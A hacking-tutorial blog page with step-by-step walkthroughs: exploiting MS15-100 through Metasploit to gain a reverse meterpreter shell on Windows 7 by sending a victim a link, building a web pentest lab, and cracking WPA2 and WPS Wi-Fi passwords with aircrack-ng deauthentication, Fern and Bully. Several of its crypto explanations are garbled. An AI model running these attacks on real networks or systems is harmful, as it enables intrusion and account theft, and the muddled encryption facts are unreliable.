Category: Hacking

Posted on by 2 Comments

Using MS15-100 vulnerability to hack Windows

Hello aspiring ethical hackers. In this howto, we will see how to hack Windows 7 with MS15-100 with recently released ms15-100 Microsoft Windows Media Center MCL exploit. For this, I am gonna use pentest lab i created in our previous howto. I am using Kali Linux as my attacker system for hacking windows 7.

Start Metasploit by typing command “msfconsole”. Search for our exploit using command as shown below.

hack windows 7

Load the exploit as shown below.

Ms15 100b

Set the IP address of Kali Linux to “srvhost” option. Set payload as “windows/meterpreter/reverse_tcp“. Set Lhost as IP address of Kali Linux.

Ms15 100c

Check if all the necessary options are set by typing command “show options“. Now run the exploit by typing command “exploit“. You will get the following result. Now copy the underlined link and send it to your victim.

Ms15 100d

When your victim clicks on the link, he will get a popup asking him to download and save the file.

Ms15 100e

When the user clicks on the downloaded file, we will get a meterpreter session on our attacker system as shown below. Type command “sessions -l ” to see the available sessions. We have one session available below.

Ms15 100f

Type command “sessions -i 1“( 1 is the session number available to us and can vary for you) to use the meterpreter session. Type “sysinfo” to know about the target system. Hurrah, we have successfully hacked our target.

Ms15 100g

That’s how we hack Windows 7 with MS15-100 exploit.

Posted on by 1 Comment

Create a web application penetration testing lab

Good Evening friends. Today we will see a step by step guide on how to create a web application penetration testing lab .

For creating this lab, I am using a host machine with Windows 7 installed on it. We also need the following software.

1. Wamp server ( Download here)

2. Vulnerawa ( Download here )

3. Vmware Workstation or Oracle Virtualbox ( Download here )

4. Kali Linux ( Download here )

Download the above software to your system. Install Wamp server. For this WAPT lab, we will use Vulnerawa as a vulnerable website or target website. Extract the contents of the vulnerawa.zip folder to the root folder of the Wamp server. Now open a browser and and type localhost in the URL bar to see if you can see the victim webapp as shown below.

Wapt1

Click on “Create Database” to create some data which we will use in our future howto’s.

Wapt2

Now let’s change the permissions of the Wamp server to access it from our attacker machine. Go to Apache>httpd.conf as shown below.

Wapt3

You should see the httpd.conf as shown below. Type CTRL+F and search for word “stuff”. After you find it, make changes as shown below in the red box. Save the file by typing CTRL+S and restart the Wamp server.

Wapt4

Now install Kali Linux in Vmware Workstation or Oracle Virtualbox (see how ). Set the network adapter to NAT. Now open command line in your host machine and check the IP address assigned to your host machine as shown below by typing command “ipconfig”. Since I am using Vmware Workstation my network adapter is Vmware network adapter vmnet8. The IP address assigned to my host machine is 192.168.64.1.

Wapt5

Now start your attacker machine( Kali Linux ), open browser and type the address 192.168.64.1 in the url bar and see if you can access the victim web application as shown below.

Wapt6
web application pentest lab

Your web application penetration testing lab is ready. Happy hacking practice.

Posted on by 6 Comments

How to crack wpa2 psk wifi password

Hello, aspiring ethical hackers. In one of our previous blogposts, you learnt what WiFi hacking is and various WiFi hacking techniques. In this blogpost, you will learn various methods to crack wpa2 psk WiFi password. Before we try to crack wpa2 psk wifi password, you need to first understand how WPA /WPA2 encryption works.

Wi-Fi Protected Access (WPA)

Also known as Temporal Key Integrity Protocol (TKIP) standard, WPA implements the TKIP encryption method and was introduced in 2003. TKIP introduced three new methods to overcome weaknesses in Wired Equivalent Privacy (WEP) standard.

1. TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 cipher initialization. WEP on the other hand merely concatenated the initialization vectors to the root key and passed this value to the RC4 cipher.
2. A sequence counter is implemented to protect against replay attacks. Hence, packets received out of order will be rejected by the Access point.
3.TKIP implements a 64-bit Message Integrity Check (MIC) replacing Cyclic Redundancy Check (CRC) used in WEP. This re-initializes the sequence number each time when a new key (Temporal Key) is used.

Wi-Fi Protected Access 2 (WPA2)

WPA 2 was introduced in 2004 to replace WPA. It implemented the mandatory elements of IEEE 802.11i. 802.11i makes use of the Advanced Encryption Standard (AES) block cipher instead of RC4 stream cipher used by both WEP and WPA. It also uses Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) encryption protocol. It provides the following security services.

1. Data Confidentiality: It ensures only authorized parties can access the information.
2. Authentication: provides proof of genuineness of the user
3. Access control in conjunction with layer management.

WPA uses 128 bit key and 48 bit initialization vector while WEP uses 108 bit key with 24 bit initialization vector. WPA2 is the successor of WPA. Both WPA and WPA2 use temporal key integrity protocol(TKIP) for encryption and pre-shared key(PSK) authentication. The only difference between WPA and WPA2 is that they use Rivest Cipher(RC4) and Advanced Encryption Standard(AES) encryption algorithms respectively. Both can be configured to use counter cipher block chaining mode(CCM) though. They are by far considered most secure for Wifi networks.

WPA – versions:

There are two versions of WPA. They are,

1. WPA – Personal:

Wi-Fi Protected Access (WPA) – Personal is designed for home and small office networks. This version uses Pre- Shared Key (PSK) and hence it is also referred as WPA-PSK (pre-shared key) mode. The network traffic is encrypted using a 128-bit encryption key derived from a 256-bit shared key. WPA-Personal mode is available on all three WPA versions.

2. WPA – Enterprise:

As its name implies, this is designed for enterprise networks and requires a RADIUS authentication server. This requires a more complicated setup but provides additional security like protection against dictionary attacks on short passwords. Various kinds of the Extensible Authentication Protocol (EAP) are used for authentication. WPA-Enterprise mode is available on all three WPA versions.

Let’s see how to crack WPA2 with aircrack first. For this tutorial, I am going to use Kali Linux. ( For this howto, if you are running Kali Linux in Vmware or Virtualbox you need to have a compatible wifi usb adapter). I am using the ALFA wireless adapter. So let’s start. Once you have turned on Kali Linux, open terminal and type command “iwconfig”. It lists all your wireless interfaces just like ifconfig shows wired interfaces.

Wpacrack1

We can see that we have a wireless interface wlan0. Now we are going to start monitor mode on our wireless interface. Monitor mode is same as promiscuous mode in wired sniffing. Type commandairmon-ng start wlan0″. We can see below that monitor mode has been enabled on “mon0″.

Wpacrack2

Now let’s see all the traffic collected by our wireless interface. Type command airodump-ng mon0.

Wpacrack3

Hit Enter. We can see all the wireless networks available as shown below.

crack wpa

We can see that all the wifi networks are configured with WPA2 or WPA. We are going to hack the network “shunya”. We will collect the shunya’s network traffic into a file. Open a terminal and type command “airodump-ng –bssid <Mac address of wifi access point> -c 13 –write wpacrack mon0″.

Wpacrack5

where

–bssid stands for base station security identifier

<MAC address> is the Mac address of access point.

-c is used to specify the channel the wifi network is operating on.

–write to write to a file.

wpacrack is the file name we are writing into.

mon0 is the interface

Hit Enter. We will see the result as below.

Wpacrack6

We can only hack a WPA/WPA2 protected wifi network by capturing it’s handshake process or association( when the client is trying to connect to the wifi network.). So let’s try to disconnect all the clients connected to the wifi network “shunya” first. Open a new terminal and type the command “aireplay-ng –deauth 100 -a <MAC> –ignore-negative-one mon0″.

where

–deauth are the deauthentication packets,

100 are the number of deauthentication packets we want to send.

-a stands for access point.

<MAC> is the MAC address of the wifi access point.

Wpacrack7

This command will send 100 DE authentication packets to the broadcast address of the wifi access point. This will make all the clients connected to the shunya get disconnected. As soon as this happens, all the clients will try to connect back to the wifi network once again. We can see that a WPA handshake has happened in the previous terminal.

Wpacrack8

Now let’s see where our capture file is located. Type “ls”. We will do dictionary password cracking here. So let’s find out where the dictionaries are. Type commandlocate wordlists”. This will show us a number of wordlists available by default in kali linux.

Wpacrack9

Our captured traffic is stored in .cap file. We will use the wordlist big.txt for cracking the password. Open a new terminal and type command “aircrack-ng wpacrack-01.cap -w /usr/share/dirb/wordlists/big.txt”.

Wpacrack10

Hit Enter. If our dictionary has the password, the result will be as below. If our dictionary doesn’t have the password, we have to use another dictionary.

Wpacrack11

That is how we crack wpa2 psk wifi password with aircrack. Remember that the choice of dictionary will play a key role in WPA/WPA2 password cracking. So that is one way in which we crack wpa wpa2 password with aircrack for you. Hope this was helpful. Learn how to crack wpa wpa2 with a graphical tool.

Posted on by

Cracking Wifi Passwords with Fern Wifi cracker

Hello aspiring ethical hackers. In one of our previous blogposts, you have learnt what is wifi hacking, types of WiFi hacking attacks etc. In this blogpost, you will learn how to crack WPA/ WPA2 password with a tool called Fern WiFi cracker.

Fern Wifi Crackeris a Wireless security auditing and attack software program written in Python. It can crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

As already explained, WPA stands for Wifi Protected Access. It is an encryption system to secure WLAN networks. It eliminates all known vulnerabilities in WEP(Wired Equivalent Privacy). WPA uses 128 bit key and 48 bit initialization vector while WEP uses 108 bit key with 24 bit initialization vector. WPA2 is the successor of WPA. Both WPA and WPA2 use temporal key integrity protocol(TKIP) for encryption and pre-shared key(PSK) authentication. The only difference between WPA and WPA2 is that they use Rivest Cipher(RC4) and Advanced Encryption Standard(AES) encryption algorithms respectively. Both can be configured to use counter cipher block chaining mode(CCM) though. They are by far considered most secure for Wifi networks.

So today we are learn cracking WPA/WPA2 passwords using a GUI tool also inbuilt in Kali Linux, Fern Wifi cracker. Open the tool, Fern Wifi cracker.

Fernwifi1

Select our wireless interface WLAN). Click on the tab “Scan for access points”. The tool will search for available access points as shown below.

Fernwifi2

Since we want to hack a WPA enabled wifi network, click on WPA tab. It will show all the available WPA enabled networks.

Fernwifi3

Click on the wifi network whose password we want to crack( in my case “shunya”). Browse to the dictionary file we want to choose as shown below.

Fernwifi4

Click on “Wifi attack” tab. The tool will automatically crack the password for you as shown below.

cracking wpa

Hope this was helpful. Learn how to crack WiFi passwords with aircrack.

Posted on by 6 Comments

Crack WPS pin with Bully

Hello aspiring ethical hackers. In our previous posts, you have learnt how to crack WiFi passwords with aircrack and Fern WiFi cracker. have seen how to crack WPA2 password and WPA password using both aircrack and Fern Wifi Cracker. In this blogpost, you will learn how to crack wireless password using a tool named Bully. For this, we will crack WPS pin. WPS stands for Wifi Protected Setup. It is a standard for easy and secure wireless network set up and connections and the pin is encoded on the Wifi router. As always brute forcing password attack consumes lot of time. It took me 6 hours 37 mins to crack this pin. So please have lots and lots of patience. Let’s start.

First let’s see our wireless interfaces. Open Terminal and type command “iwconfig.

Wpacrack1

Let’s place our wireless interface in monitor mode. Monitor mode is same as promiscuous mode in wired sniffing. Type commandairmon-ng start wlan0″. We can see below that monitor mode has been enabled on “mon0″.

Wpacrack2

Open a new terminal and type command “airodump-ng mon0″ and hit Enter.

Wpacrack3

We can see all the wireless networks available as shown below. Look for a WPA/WPA2 enabled network.

crack wpa2

Copy the MAC address of the wifi network whose password you want to crack. For this howto I will crack the password of wifi network “shunya”. Open Terminal and type command “bully -b <MAC address> -c 13 -B mon0″ and hit Enter.

<MAC address> is the MAC address of the Wifi network.

-c is the channel our wifi network is running on,

-B = bruteforcing.

Bully5

We can see that the tool bully will try different pins to crack the password. After a long time( as I already told you) the tool will give out the current pin and the password of the wifi network as shown below.

Bully6

This is how we crack WPS with Bully.